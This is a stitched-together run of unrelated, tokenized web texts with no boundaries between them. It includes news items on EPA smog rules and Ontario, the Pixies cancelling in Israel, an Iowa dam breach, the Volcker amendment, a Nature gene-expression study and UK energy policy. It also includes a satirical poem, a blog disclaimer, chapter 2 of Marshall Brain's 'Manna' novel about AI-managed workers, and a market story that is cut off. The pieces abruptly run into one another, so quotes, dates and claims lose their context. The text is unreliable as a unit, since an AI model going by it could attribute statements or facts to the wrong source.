WASHINGTON —U.S. air quality regulators were n’t thinking about Canadian lungs when they tabled new rules earlier this month designed to put the squeeze on pollutant - spewing power plants .
But tough new rules on coal - fired plants in Smog Alley look to profoundly cut air pollution in southern Ontario .
The Environmental Protection Agency is ordering hundreds of U.S. generating stations to cut sulphur dioxide and nitrous oxide emissions by more than 50 per cent in the next few years .
Dozens of stations are expected to close and the remainder will have to adopt new , cleaner technologies .
“ Whether you live in Toronto or New York City , the flow of pollution does not recognize borders , ” said Janice Nolen , air policy specialist with the American Lung Association .
“ And so , as the EPA moves to tighten standards , we anticipate the Canadian benefits will be significant , particularly along the Great Lakes . ”
The Ontario government calculates that U.S. - sourced air pollution is responsible for more than half of southern Ontario ’s smog , it causes more than 2,700 premature deaths annually and triggers the hospitalization of 12,000 others .
That equates to an estimated $ 5.2 billion in damage to Ontario ’s people , economy and environment each year , the environment ministry says .
Meanwhile , the Ontario Clean Air Alliance credits the Ontario government with achieving a 73 per cent reduction in coal - fired electricity production since Dalton McGuinty became premier .
“ So does that mean our air is already cleaner ?
One thing that is striking is that despite this being such a hot summer we ’ve actually had surprisingly few smog alerts in Toronto , ” Gibbons said .
“ There is no question that the recession is affecting demand for power .
But the shift away from coal shows , and other efficiency measures demonstrate , that much of the gains will be permanent .
If you combine what ’s happening on the Canadian side with regulatory efforts on the U.S. side , it adds up to very good news for Ontario . ”
At issue in the U.S. are EPA “ transport ” proposals published earlier this month that tighten Bush - era limits on emissions of sulfur dioxide ( SO2 ) and nitrogen oxides ( NOx ) from power plants .
When implemented in 2014 , the utilities will have to cut SO2 by 52 per cent and NOx by 71 per cent from 2005 levels .
The EPA rules have teeth in and of themselves , but could also serve to prod the U.S. Senate into encoding the regulations in legislation .
Public health advocates say that while the earlier Bush - era regulations were struck down in 2008 by a U.S. Circuit Court , the new EPA recommendations are more likely to withstand court challenges and emerge as a firm new standard .
“ The electrical utility lobby has been fighting this for decades , ” Nolen said .
“ But the momentum we ’re seeing at the EPA suggests that over the next year , the utilities will be facing the decision to implement greater controls and in some cases shut down some of the individual coal plants that are 40 or 50 years old . ”
“ What is striking is that the EPA appears to have crafted the transport rule in such a way as to be legally bulletproof , ” said Frank O’Donnell , president of Clean Air Watch , a U.S. environmental group .
“ And we believe this is just the first prong of a three - pronged approach , with more rules next year , including standards for hazardous emissions of mercury , arsenic and other unregulated pollutants . ”
“ It is reminiscent of the tortoise and the hare story .
Right now most of the U.S. media are focused on the stalled climate bill in Congress , with Senator John Kerry ’s every belch attracting attention .
Meanwhile , the EPA is not getting much attention as it busily goes about cleaning up the air in ways that will have a far more dramatic impact in the next decade . ”
Transboundary air pollution has long been an irritant to the Ontario government , which has twice hosted Shared Air Summits in an ongoing effort to curtain Stateside sources of smog - forming particles , which scientific analysis suggests is a primary contributor to smog .
“ Are we following what the EPA is doing ?
Yes and with great interest and support , ” said Kate Jordan , a spokeswoman with Ontario ’s environment ministry .
“ More than 50 per cent of Ontario ’s smog comes from U.S. sources and we welcome any improvements .
It ’s good news for us . ”
Bruce Hill , senior scientist with the Boston - based Clean Air Task Force , likens the new U.S. regulatory efforts to earlier EPA regulations targeting acid rain , noting that Canada and the U.S. ultimately were proven to have shared $ 122 billion in benefits from impact - reduction efforts costing $ 3 billion .
“ It would not be a stretch to say that the reductions from the proposed ( EPA ) rule should benefit the health , visibility and ecology of adjacent Canada , ” said Hill .
“ Since 90 per cent of the Canadian population lives within 100 miles of the border , Canadians will see the gains . ”
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Some air quality experts suggest the gains are already underway throughout “ smog alley ” — the rust - belt corridor stretching along Lake Erie that is frequently blamed as a net contributor to smog in southern Ontario .
No consensus yet exists as to whether the recent air quality improvements are a consequence of recession , regulation or a combination of the two .
The U.S. Clean Air Task Force , in testimony before a Senate subcommittee last week , said the combination of state and federal ( EPA ) enforcement brought about a 50 per cent reduction in power - plant sulfur dioxide emissions ( to 5.6 million tonnes from 11 million ) between 2004 and 2009 .
“ The economic recession did not cause the reductions , ” the organization testified .
“ Installation of 130 sulfur scrubbers did it . ”
Image caption The Pixies , led by Black Francis , were an influence on Nirvana , Blur and Radiohead
Influential US rock group Pixies have cancelled their first performance in Israel , blaming " events beyond our control " .
The group did not specify why they were pulling out of the show , which was due to take place in Tel Aviv on 9 June .
However , organisers said the decision was linked to Israel 's deadly raid on a Gaza - bound aid flotilla last week .
The band , whose albums include Surfer Rosa and Doolittle , were due to be headliners at the Pic. Nic festival .
Other acts - including UK band Gorillaz Sound System - have also withdrawn from the event .
Last month , Elvis Costello pulled out of two gigs in Israel saying that his appearance there could have been " interpreted as a political act " .
The musician said his decision was " a matter of instinct and conscience " and " too grave and complex " to be addressed at a concert .
Deepest apologies
Pixies had been sent letters by human rights activists before last week 's raid , urging them to cancel their appearance because of Israel 's policies towards the Palestinians .
It is not known whether this influenced them directly .
A short statement from the band read : " The decision was not reached easily and we all know well the Israeli fans have been waiting for this visit for far too long .
" We 'd like to extend our deepest apologies to the fans but events beyond all our control have conspired against us . "
Concert promoter Shuki Weiss , who has been responsible for bringing artists such as Madonna to Israel , is the driving force behind the Pic.
Nic festival .
DELHI , Iowa 
Heavy rain ruptured the Lake Delhi dam on Saturday , sending a torrent into the Maquoketa River below and forcing the evacuation of hundreds of homes and vacation cabins in eastern Iowa .
Officials estimated that 8,000 people were affected by the flooding .
No injuries or deaths were reported .
Unrelenting rainfall  15 inches in the past 48 hours , according to Jeremy Sands of the Delhi Fire Department  caused the early afternoon breaching of the 83 - year - old dam .
“ The dam was n’t unsafe , ” Firefighter Sands said .
“ It ’s just one of those acts of God . ”
A section of earth about 125 feet wide and 40 feet deep gave way , said the Delaware County emergency manager , Mike Ryan .
“ It ’s the worst damage I ’ve been associated with , ” he said .
Rising waters washed out the berm , and large chunks of the road on the dam broke off .
“ It just peeled off eight - foot sections and dumped them , ” said Shirley Helmrichs , the Delaware County supervisor .
“ The light poles started falling like matchsticks ; they just started snapping over .
You could hear this crunching , this rumbling .
It was like the dam was just growling . ”
Merkley , Levin : Free the Volcker Rule
Faced with Losing Vote on Amendment , Wall Street Lobbyists and Republicans Try to Rig the Result
WASHINGTON , D.C. – Today , Senate Republicans refused to allow a vote on a long - anticipated amendment to the Wall Street accountability bill that will ban the high - risk trading that brought our economy to the brink of meltdown .
The amendment ’s chief sponsors , Oregon Senator Jeff Merkley and Michigan Senator Carl Levin , today called on Republicans to stop protecting Wall Street lobbyists and allow the amendment to come up for a vote .
“ We got into this financial crisis because Wall Street set the rules to benefit itself , and now with an assist from Senate Republicans , they ’re doing it again , ” said Merkley .
“ Obviously the lobbyists are afraid they ’ll lose this vote , and in typical Wall Street fashion their solution , with help from Senate Republicans , is to rig the result .
Main Street is being shut out of this debate .
It is time to stop letting Wall Street call the shots – let this amendment have a vote . ”
“ The long arm of Wall Street reached directly into the Senate chamber today , ” Levin said .
“ By blocking us from even debating this amendment , the Republican leadership is carrying Wall Street 's water and standing in the way of real reform . ”
Despite repeated efforts by Dodd to reach agreement on a vote on the amendment , Republican Leadership refused to agree to even a 60 - vote supermajority requirement on a day that two Democrats are absent .
Under Senate rules , votes on amendments must be agreed to by unanimous consent .
For weeks , the Merkley - Levin amendment has been one of the handful of amendments expected to be at the center of debate on the legislation .
The Merkley - Levin amendment , implementing the so - called “ Volcker Rule ” named after the former Fed chairman , would restrict proprietary trading at banks and other large , important financial institutions .
By keeping our banks and other large , complex financial institutions away from these risky activities , the bill will help protect taxpayers from bailouts and the damage to the economy that comes from the failure of critical financial institutions .
At the same time , the bill leaves plenty of space for smaller firms to do speculative trading , but outside of taxpayer - supported commercial banks .
Specifically , the bill :
• Bars banks , bank holding companies , and their affiliates and subsidiaries from engaging in high risk speculation involving any stock , bond , option , commodity , derivative , or other security or financial instrument .
Also bars those entities from investing in a hedge fund or private equity fund .
• Requires massive , systemically - critical nonbank financial institutions ( i.e. , giant Wall Street investment houses whose failure will damage the banking system and access to credit ) to set aside additional capital to decrease the risk posed by speculative trading .
• Prohibits conflicts of interest such as we saw when Goldman Sachs bet against the packages of securities they assembled and sold to their clients .
Flash Gordon Movie News
| By
Director Breck Eisner ( “ The Crazies ” ) tells Airlock Alpha that his planned “ Flash Gordon ” film will hopefully be the ‘ origin ’ story of a franchise if he gets his way .
“ It will be a standalone story , it definitely wo n’t left open for more , but the ultimate goal is to turn it into a franchise …
It will be an origins story for Flash .
He ’s going to Mongo , he ’s gonna save the planet and it will have a superhero buy in and will be unique .
It is very much a superhero origins story ” says Eisner .
Rather than camped up tone of the 1980 film , Eisner plans a straight forward adaptation which will update the original 1930s comic strips and “ shoot the movie as if the strips were drawn today ” .
The director also wants to avoid being compared to SyFy ’s attempted TV series remake a few years ago which he labels “ crap , total crap . ”
Some more news on the upcoming Flash Gordon film .
I ’d say remake , but it ’s not intended to be one .
This film is supposed to be more closely following the original comics and serials , than any of the 80 ’s movie .
Here ’s what the director recently said about his take on the film :
Thankfully SyFy ( the network that can screw up anything ) already “ reimagined ” Flash Gordon so horribly that no other reimagining will likely be considered for some time .
I ’m hoping that if this is true , the director is able to really create a new and unique world for Flash , yet stay true to the roots of the character and not feel the need to reinvent the characters .
The potential is there , no doubt , with the established mythos .
I think Eisner may have the chops to pull it off too .
His remake of “ The Crazies ” was one of the underrated films of the last year and vastly superior than the original .
If he can bring that kind of vision and directing to this project , Flash Gordon may finally be able to step out of the B - movie realm and into the mainstream again .
( overheard at a promise keepers gathering )
i drink the puss
of the earth
and spit it out
in an orgasm
of rage
i take wet noodles
from the sky
and smash them
on my face
to hide my tears
i flail my wife
with her own
ragged soul
until she smiles
with my teeth
i do these things
for you lord
so you
will
love me
Next
Products through various tests , layers to control - your first choice for quality
Due to the fact that I have many wallpapers in my collection , downloaded from many sources ,
It is not possible for me to give the creators of each one a link back to their own wallpaper .
If you are , however , the creator of one of the wallpapers and specifically ask me to give a link that you provide to the source ( or to delete the wallpaper ) , I will be happy to comply .
If you have a question or problem , email me at admin( at ) awesomewallpapersblog( dot ) com
Published online 18 July 2010 | Nature | doi:10.1038/news.2010.358
News
How human proteins are made from DNA can be followed in real time .
Expression of individual human genes can now be viewed in real time .
Getty
Scientists have viewed the expression of an individual gene inside a human cell .
Knowledge of the real - time dynamics of gene expression may help researchers to explain variation among genetically identical cells and the molecular processes that lead to cancer .
Traditionally , biochemists and cell biologists examined the time - averaged behaviour of thousands or millions of cells in order to understand how the information contained in genes is used to make proteins .
Then , in the late 1990s , researchers developed a technique to tag genes so that they produce a fluorescent signal the moment they are transcribed into protein blueprints known as messenger RNA1 .
Researchers have imaged individual genes in bacteria and single - celled animals , and found that , rather than humming along at a constant rate as had been assumed , they seem to flicker on and off in bursts as they produce mRNA2 .
Until now , however , no one had applied the visualization technique to observing a single gene in mammalian cells .
“ This represents the continuing evolution of a technology that is going to revolutionize the way people think about biology . ”
" This represents the continuing evolution of a technology that is going to revolutionize the way people think about biology , " says Gordon Hager , a cell biologist at the National Cancer Institute in Bethesda , Maryland , who was not involved in the study .
The chief problem with previous methods for visualizing transcription in mammalian cells is that these require researchers to blast cells with hundreds of copies of the specially tagged gene .
Once inside the cell , the tagged genes are inserted into a cell 's genome at random .
Some regions of the genome are naturally transcribed into proteins at a high rate , whereas other regions are essentially silent .
Overall , therefore , the process obscures the behaviour of specific genes .
" In our system , the cell line has a target sequence in its genome and any sequence you send in will always go to that place , " says senior author Yaron Shav - Tal , a cell biologist at Bar - Ilan University in Ramat Gan , Israel .
" You can make different cell lines and not be worried about where the gene went in . "
ADVERTISEMENT
Shav-Tal and his colleagues describe the technique online today in Nature Methods3 .
To test the method , they created two clones of a human embryonic kidney cell line with an engineered version of the gene cyclin D1 , which controls the cell cycle .
Both clones included a DNA sequence that allow a fluorescent protein expressed in the cell to bind to cyclin D1 RNA the moment it is transcribed .
One clone depended on the gene 's natural promoter — the binding site for the polymerase enzyme that transcribes DNA into mRNA — whereas the other was fused to a viral promoter known to overexpress genes by producing an abundance of mRNA .
By visualizing the process at the level of a single gene , the researchers were able to work out the different mechanics of transcription between the human and viral promoter .
The cells with the normal promoter shut down for about 20 minutes every 200 minutes , whereas the cells with the viral promoter remained active for a 10 - hour stretch .
More significantly , the latter group of cells recruited twice as many polymerase enzymes — about 14 — which crammed along the gene 's length , all producing mRNA .
The method will allow researchers to investigate the mechanics of other promoters , as well as disparate phenomena such as the pulsing of hormones produced by the endocrine system .
" This is a whole new outlook , " says Shav - Tal .
" People now know that even if the whole population of cells is supposed to be identical , each one has a different expression profile . "
WASHINGTON — Lawmakers take contributions every day from corporate executives and lobbyists hoping for their votes .
The question of whether that represents business as usual in Washington or an ethics breach is at the heart of a far - reaching Congressional ethics investigation that is stirring concerns throughout Washington and Wall Street .
The Office of Congressional Ethics has sent corporate donors and fund - raising hosts more than three dozen requests for documents involving eight members who solicited and took large contributions from financial institutions even as they were debating the landmark regulatory bill , according to lawyers involved in the inquiry .
The requests are focusing on a series of fund - raisers last December , in the days immediately before the House ’s initial adoption of the sweeping overhaul , which could win final approval this week .
Some of the fund - raising events took place the same days as crucial votes .
For example , on Dec. 10 , one of the lawmakers under investigation , Representative Joseph Crowley , a New York Democrat who sits on the Ways and Means Committee , left the Capitol during the House debate to attend a fund - raising event for him hosted by a lobbyist at her nearby Capitol Hill town house that featured financial firms , along with other donors .
After collecting thousands of dollars in checks , Mr. Crowley returned to the floor of the House just in time to vote against a series of amendments that would have imposed tougher restrictions on Wall Street .
Businesses can expect to face a steep rise in energy bills after the government today published a comprehensive plan to cut greenhouse gases and end Britain 's dependence on risky oil and gas imports .
Although the individual policies had previously been announced in the coalition policy agreement or by ministers – and many were formerly Labour government initiatives – Chris Huhne , the energy and climate secretary , said the first annual energy statement provided more detail and a timetable for each move from consultation to legislation .
Alongside the energy statement , the Conservative - Liberal Democrat coalition published what it said was the first yearly estimate of the impact of its policies on customer bills .
The estimate shows that compared to prices with no government action , combined annual gas and electricity costs for households would rise only £ 13 by 2020 , but those for businesses would increase by hundreds of pounds a year .
This is because businesses would benefit less from energy - efficiency measures available to households .
A third document showing different policy options for meeting the pledge requirement to cut emissions of greenhouse gases by 80 % by 2050 was also published .
It shows six " pathways " with different mixes of renewable energy such as wind and solar power , nuclear generation , and carbon capture and storage for gas and coal plants .
Despite Huhne telling parliament he was confident new nuclear reactors would be built , one option shows that the targets could be met even without any new nuclear power plants to replace the current reactors when they go out of service by 2035 .
As a result of the policies , " the lights are not going to go out on my watch " , said Huhne .
The publication was welcomed by many groups and businesses involved in supplying and financing low - carbon power .
Paul Golby , chief executive of power giant E.ON UK , said : " These changes are essential to ensure we can all play our part in making sure the challenge of the trilemma is met – a low - carbon future with secure and affordable energy . "
However there were widespread concerns about continuing lack of detail and that progress would be hampered by a raft of new consultations and reviews of individual initiatives , including the promise to install " smart meters " in every home and testing new carbon capture and storage technologies .
Ed Miliband , the shadow energy and climate secretary who formerly held Huhne 's job , accused his successor of going " backwards not forwards " on several policies , including delays caused by further consultation on incentives for renewable heat , cutting promised funds for the green investment bank , abandoning some renewable energy targets , and comments by Huhne 's Conservative energy minister , Lord Marland , that " there should be no dramatic increase " in onshore wind turbines .
Huhne 's Department of Energy and Climate Change also announced two weeks ago that it was cutting spending by £ 85 m including £ 34 m of support for low - carbon technology .
Funding for many policies announced today will also depend on the outcome of a tough autumn spending review .
" Any fair - minded person looking at this statement will conclude that it is a huge disappointment – a huge disappointment to industry , to the country as well , " added Miliband .
Huhne said public spending had to be slashed because the Labour government departed – in the words of outgoing Treasury secretary Liam Byrne – with " no money left " .
" I do n't think he [ Miliband ] does the cause of progressive politics or green politics any good if he believes there 's a bottomless pit [ of money ] , " added Huhne .
Responding to big projected increases in energy bills , the Confederation of British Industry ( CBI ) said that , while business accepted there would be increased costs , it was concerned that mooted government ambitions for a higher target for renewable energy would push prices even higher , and urged ministers to help high energy users who were competing in international markets , such as steel companies .
Other businesses could pass on the higher bills to customers , said Matthew Farrow , the CBI 's head of energy .
The projections assumed fossil fuel prices remain level at approximately US$ 80 ( £ 51.46 ) a barrel of oil .
Business bills would rise by less - and domestic bills be cut - if oil prices rose by the much higher estimates of the International Energy Agency or the US government , because of energy efficiency policies , said Huhne .
" The new study shows that a high - tech low - carbon future is within our grasp but it wo n't be achieved without massive public and private investment and a detailed plan , " said Greenpeace executive director , John Sauven .
" Right now it 's not clear that ministers are committed to unlocking that investment , and without it any plan is worthless . "
THIS BLOG IS TO SHARE INFORMATION ABOUT CERTIFICATION EXAMS , SOME FACTS ABOUT LIFE , INDIVIDUALS AND COUNTRIES , BOLLYWOOD AND HOLLYWOOD MOVIES , MUSIC , TV SHOWS , JOKES , QUOTES , GADGETS , TECHNOLOGY , CONTESTS , OFFERS , WEB TOOLS , TRAVEL , HEALTH , FAMILY , RELATIONSHIPS AND SOME REAL LIFE EXPERIENCES .
BRUSSELS — David Cameron , the British prime minister , on Tuesday sharply criticized opponents of Turkey ’s membership in the European Union , echoing concerns voiced in the United States that the bloc was doing too little to anchor Ankara within the West .
On his first visit to the Turkish capital since becoming prime minister in May , Mr. Cameron likened France ’s opposition to Turkey ’s bid for membership to the French veto of Britain ’s bid to become part of the European Union ’s forerunner in the 1960s .
Turkey began talks with the European Union in 2005 , but progress has been painfully slow .
Though the technical reason for this is connected to Turkey ’s failure to recognize Cyprus , the political backdrop is one of division within the European Union as to whether a large , mainly Muslim nation should be admitted .
“ When I think about what Turkey has done to defend Europe as a NATO ally , ” Mr. Cameron said , “ and what Turkey is doing today in Afghanistan alongside our European allies , it makes me angry that your progress toward E.U. membership can be frustrated in the way that it has been .
My view is clear : I believe it is just wrong to say that Turkey can guard the camp but not be allowed to sit in the tent . ”
Manna Chapter 2
by Marshall Brain
If you have not read chapter 1 yet , please start there .
Once Burger - G proved that Manna worked , the idea spread like wildfire .
Every restaurant chain used Manna .
Every retail store , whether it was a discount store , a home improvement store , a toy store , or an office supply store , had Manna systems .
You saw people wearing headsets on construction sites , in airports , at amusement parks , in hospitals , in movie theaters , at the grocery store ...
They were everywhere .
Prefer the Kindle ?
" Manna " is now available on the Kindle - Click here !
Join the discussion on Reddit I can remember sitting down one day with my friend Brian at lunch .
He was working at the giant discount supercenter in Raleigh , and they had just switched over to Manna .
He was stunned .
" It does n't matter if you are a hard worker or a slacker -- once you put on the headset , you are going to be working every minute of the day or you are gone .
The system has already fired five people . "
" What 's it have you do all day ? "
There were something like 50 people working in the supercenter at any given time -- it was a 200,000 square foot store .
" Manna has you moving through the store aisle by aisle .
I bet I am walking six or eight miles a day right now .
I am constantly straightening merchandise on the shelves .
Manna knows where I am , and it knows where everything is on the shelves , so it asks me item by item to straighten them .
Manna wants everything on the shelves looking perfect .
It is also big on restocking .
So it will ask me , ' How many rolls of masking tape are on the shelf ? '
Whenever anything gets low , it has me go to the back and bring stuff out to the shelves .
It knows what is selling through the cash registers , so it knows exactly when to restock everything and it makes sure that every single item in the store is fully stocked . "
" That does n't sound so unusual . " I said .
" It 's not unusual , except that Manna is telling you exactly what to do every second of every day .
If it asks you to go to the back and get merchandise , it tells you exactly where to walk to go get it .
And here is the weirdest part -- I never see another employee the entire day .
The way it makes me walk , I never run into anyone else .
I can go for a full shift and never see another employee .
Even our breaks are staggered .
Everyone takes their breaks alone .
We all arrive at staggered times .
It 's like Manna is trying to totally eliminate human interaction on the job . "
" That 's spooky .
Why would it do that ? "
I asked .
Brian looked down , " I 'm guessing that talking with co-workers wastes time , and Manna is eliminating the waste everywhere it can . "
" What else does it have you doing ? " I asked .
" I am constantly checking for spills and other problems in the aisles -- Manna uses us as its eyes to constantly look for problems .
I am also looking for customers in the aisles and asking them how I can help -- customer service is huge to Manna , as long as it takes less than 30 seconds .
And Manna always has us looking for shoplifters .
All day long we are walking back and forth up and down the aisles straightening things , asking people if they need help and looking for shoplifters .
And like I said , you never run into another employee .
There 's no chatting .
I never see Amy anymore .
Or Kevin .
The minute you put on the headset you are working , and you work alone without stop until you take the headset off at the end of the shift . "
" Shit . "
That 's all I could think to say .
Brian asked , " Does Manna count you down during your breaks at Burger - G ? " " Yes , every minute you get a reminder . "
Even your breaks were supervised .
I had never thought about it , but all the breaks at Burger - G were staggered as well .
When Mom and I went to shop in Brian 's store , you could feel the difference that Manna made .
Every two or three minutes an employee would walk past you no matter where you were in the store .
The merchandise on the shelves was always neat , and everything was stocked .
The floors were spotless .
Shopping carts never stacked up in the parking lot .
If you needed help , you knew that all you had to do was stand there and an employee would walk by in a minute or so .
As the Manna software evolved , it gained more and more responsibility .
From the start Manna was able to schedule employee hours .
Manna printed a piece of paper for each employee to put on the refrigerator -- it told you your hours for the week .
In version 2.0 they went further .
They connected Manna to the telephone network and the public email network .
So Manna was able to begin calling and emailing employees and reminding them to show up on time .
If an employee did n't show up , Manna could call in a replacement .
If the store became unexpectedly crowded , Manna could call in reinforcements .
In version 3.0 , the software gained the ability to fire employees as well .
I had a friend who got fired that way .
He came into the store late for his shift , and it was his third time being late .
He punched in and put on his headset .
He walked over to the eye scan station to log in .
He said Manna sounded normal , and had him working normally for about half an hour .
Then Manna asked him to walk to Zone 7 at the back of the store .
A Burger - G security guy was standing there with three sheets of paper .
The security guy was wearing the solid black security uniform , the opaque sunglasses and a headset integrated into the helmet .
He looked back and there was another security guy standing near the door .
Manna said to him , " Steven J. Canis , employee number 4378561 , your employment at Burger - G store number 152 is hereby terminated in accordance with employee manual paragraph 12.1 , failure to appear at work on time . "
Manna read him the three pages of termination information paragraph by paragraph and asked him to confirm each paragraph .
He could not return to that Burger - G store for a year .
He could not reapply to Burger - G for five years .
Stuff like that .
Manna made him sign the papers and the security guys escorted him out of the store to his car .
The security guys never said a word , but Manna was talking to him during the entire walk , telling him to look down , to make no gestures , to speak to no one .
The last thing Manna said to him was , " Remove your headset and hand it to the security officer on your left .
Goodbye . "
It did n't take long for word to get around .
Pretty much , if you knew you were going to be late and you had been late before , you called Manna on your cell phone and quit .
Manna emailed the forms to you , had you phone in when you got them so it could read them to you , and you signed them .
It really cut down on people being late .
By version 4.0 , Manna gained the ability to outsource .
Let 's say that Manna decided it was time to repaint the lines in the parking lot .
Manna would make this decision using customer surveys and by periodically asking employees questions about the parking lot , the paint inside the store , the exterior of the store , the roof , etc .
An inspector from Burger - G corporate would also come once a month and feed information about the store and grounds into the Manna system .
When Manna made the decision to repaint the stripes in the parking lot , it would call several companies and get bids .
Manna did not do this on the phone , obviously .
It did it electronically through the Internet .
By this time , most companies were hooked into the Manna network , even if the company did not use Manna to manage employees .
The two pieces of software -- the Manna software running the Burger - G restaurant and the Manna software running the parking lot maintenance company -- would bid and negotiate through the Internet .
The Latest Book is Available !
" Imagining Elon Musk 's Million - Person Mars Colony - The greatest thought experiment of all time ! " is now available free here on MarshallBrain.com - Click here to start reading !
Join the discussion on Reddit Because everything was done by machine , the restaurant 's Manna system could send out a request for bids to all the parking lot maintenance companies in the area .
Those companies would send bids back through the network .
The restaurant 's Manna system would then connect with hundreds of other Manna systems to check references and get feedback on past experiences with each vendor .
Based on the bid prices and the feedback , Manna would select a vendor , negotiate terms , make a deposit and schedule the repainting job .
The entire process from start to finish took less than 10 seconds .
As these communication networks between all the different Manna systems built up , things started to get uncomfortable for every worker .
For example , the Manna software in each store knew about employee performance in microscopic detail -- how often the employee was on time or early , how quickly the employee did tasks , how quickly the employee answered the phone and responded to email , how the customers rated the employee and so on .
When an employee left a store and tried to get a new job somewhere else , any other Manna system could request the employee 's performance record .
If an employee had " issues " -- late , slow , disorganized , unkempt -- it became nearly impossible for that employee to get another job .
Nearly every company with minimum wage employees used Manna software or something similar , and performance records on employees were a major commodity freely exchanged between corporations .
A marginal employee got blacklisted in the system very quickly .
That ability to blacklist employees is where things got ugly , because it gave Manna far too much power .
Manna was everywhere , and it was managing about a half of the workers in the United States through headsets , cell phones and email .
Manna moved in and took over a big chunk of the government as well .
There came a point where tens of millions of humans did nothing at work unless told to do so by a Manna system .
Prefer the Kindle ?
" Manna " is now available on the Kindle - Click here !
Join the discussion on Reddit
You can imagine what would happen .
Manna fires you because you do n't show up for work a couple times .
Now you try to go get a job somewhere else .
No other Manna system is going to hire you .
There had always been an implicit threat in the American economy -- " if you do not have a job , you can not make any money and you will therefore become homeless . "
Manna simply took that threat and turned the screws .
If you did not do what Manna told you to , it would fire you .
Then you would not be able to get a job anywhere else .
It gave Manna huge leverage .
For example , Manna could call in reinforcements as it needed them .
You would get a call from Manna and it would say , " Your Burger - G restaurant is experiencing unexpected customer volume .
Can you help ? "
The word " help " meant , " Can you be here in less than 10 minutes ? "
You could say yes or no .
The problem was that if you said " no " too many times , you got fired .
And when you got fired , it meant you were blacklisted in the system .
Once you figured that out , you were pretty much forced to say " yes " .
That meant that the printed schedules started to become pretty much irrelevant .
Manna would call you when it wanted to call you .
Then it started calling you to other restaurants .
If things got slow in the restaurant , Manna would send you home , then call you back in later if things got busy again .
You really could not say " no " very often , meaning that Manna could interrupt your life at any time .
Version 4.0 of Manna was also the first version to enforce average task times , and that was even worse .
Manna would ask you to clean the restrooms .
But now Manna had industry - average times for restroom cleaning stored in the software , as well as " target times " .
If it took you too long to mop the floor or clean the sinks , Manna would say to you , " lagging " .
When you said , " OK " to mark task completion for Manna , Manna would say , " Your time was 4 minutes 10 seconds .
Industry average time is 3 minutes 30 seconds .
Please focus on each task . "
Anyone who lagged consistently was fired .
At the supercenter , Brian said that Manna was now tracking how fast employees walked from point A to point B in the store , and if you did not walk fast enough Manna would warn you about it .
It was just like working on an assembly line , where they could speed up the line to make people work faster .
But now the assembly line was everywhere , and if you did n't keep up you knew that you would be blacklisted nationwide .
The most surprising part of the Manna system , however , was the effect it had on wages .
As Manna spread to so many businesses , your choice was to work for Manna or to be unemployed .
When you started to work for Manna , it paid you minimum wage .
There was no reason for it to pay you any more -- your choice was minimum wage or zero .
There was no way to ask Manna for a raise .
You could quit , but when you quit you would be applying to another business that used Manna .
It was going to give you minimum wage too .
This was the societal power of Manna , and the basic equation was pretty simple .
You could take the job for minimum wage , or you could be unemployed making zero .
At any moment Manna could replace you with another warm body , and that meant that you did what you were told for minimum wage or you got fired .
Manna , and the corporations that used it , knew that that was the equation .
There were plenty of unemployed people who would take your spot as soon as you left .
The effect of Manna was to stratify out all the minimum wage workers in America .
At the bottom you had the people who were unemployable .
They had screwed up and been blacklisted by Manna .
They were back living with their parents or sleeping on the sofa with a friend .
You could get yourself un - blacklisted , but if you got blacklisted more than a couple times , you were dead .
Then there were all the unemployed people .
Between Manna improving efficiency and forcing out the managers , plus overseas outsourcing taking out white collar jobs , plus machines like the automated checkout lines and burger flippers coming on line and so on , there were plenty of people who were unemployed .
Unemployed people went around all day applying to jobs .
But in a sense , that was pointless .
All of the interconnected Manna systems knew every single person in the job pool .
Manna also knew the performance of every single person who had ever worked in the system .
You were in an incredibly bad spot if you were unemployed .
Then there were all the people being managed by Manna .
They all made minimum wage .
If you were wearing a headset at work you were making minimum wage and everyone knew it .
And everyone knew that if you did not do what Manna told you to do , as fast as Manna told you to do it , you would be unemployed and making nothing .
And then there was everyone else -- the doctors , lawyers , accountants , office workers , executives , politicians .
The executives and politicians made a ton of money and they were never going to be wearing headsets .
Joe Garcia at Burger - G was making $ 100 million per year and flaunting it like a rock star .
And Manna was starting to move in on some of the white collar work force .
The basic idea was to break every job down into a series of steps that Manna could manage .
No one had ever realized it before , but just about every job had parts that could be subdivided out .
HMOs and hospitals , for example , were starting to put headsets on the doctors and surgeons .
It helped lower malpractice problems by making sure that the surgeon followed every step in a surgical procedure .
The hospitals could also hyper - specialize the surgeons .
For example , one surgeon might do nothing but open the chest for heart surgery .
Another would do the arterial grafts .
Another would come in to inspect the work and close the patient back up .
What this then meant , over time , was that the HMO could train technicians to do the opening and closing procedures at much lower cost .
Eventually , every part of the subdivided surgery could be performed by a super - specialized technician .
Manna kept every procedure on an exact track that virtually eliminated errors .
Manna would schedule 5 or 10 routine surgeries at a time .
Technicians would do everything , with one actual surgeon overseeing things and handling any emergencies .
They all wore headsets , and Manna controlled every minute of their working lives .
That same hyper - specialization approach could apply to lots of white collar jobs .
Lawyers , for example .
You could take any routine legal problem and subdivide it -- uncontested divorces , real estate transactions , most standard contracts , and so on .
It was surprising where you started to see headsets popping up , and whenever you saw them you knew that the people were locked in , that they were working every minute of every day and that wages were falling .
Prefer the Kindle ?
" Manna " is now available on the Kindle - Click here !
Join the discussion on Reddit A decade later I was getting out of school .
I had a BA in education and a master 's degree in educational administration .
My plan was to teach in high school for two or three years so that I had experience " in the trenches " , and then move into an administrative or government position .
I was ready to start teaching and I was looking forward to it .
Education was one area that , so far , had been largely untouched by Manna , so in that sense I was lucky .
I was also lucky that there were jobs available , and I did not have a lot of problems finding an open position .
That was a miracle .
My graduation year was an important year for me -- I had been working at Burger - G all through school to make spending money , and now I would have my first real job free from Manna .
But it turned out to be a pivotal year for America as a whole .
It was a funny coincidence .
My graduation year was the year that computer vision came of age .
Intro | On Kindle | Go to Chapter 3 >>>
You may also enjoy this in - depth interview , " Marshall Brain on Singularity 1on1 :
We 're approaching humanity ’s make or break period " :
On the coming Singularity and Artificial Intelligence : A Conversation with Marshall Brain from MIRI on Vimeo .
See Also About the Author
Robotic Nation
Robots in 2015
Robotic Freedom
Robotic Nation FAQ
Robotic Nation Evidence
Basic Income
Discard your body
Manna - the book
Science on the Brain
Careful Parents
Star Wars
How God Works
How to make a million dollars
Reviews
Salon
Wired
LiveScience
LATimes Editorial
Geek of the week
Thanks for visiting today ,
© Copyright 2017 by Marshall Brain .
All rights reserved .
A soft spring rain patters the sidewalk outside In Season Local Market .
Milk in glass bottles , artisan cheese and yogurt line the coolers .
Neatly placed canned goods fill some shelves , and freshly baked bread rests on a wooden shelf next to the cash register .
It ’s the picture of a neighborhood market with one twist :
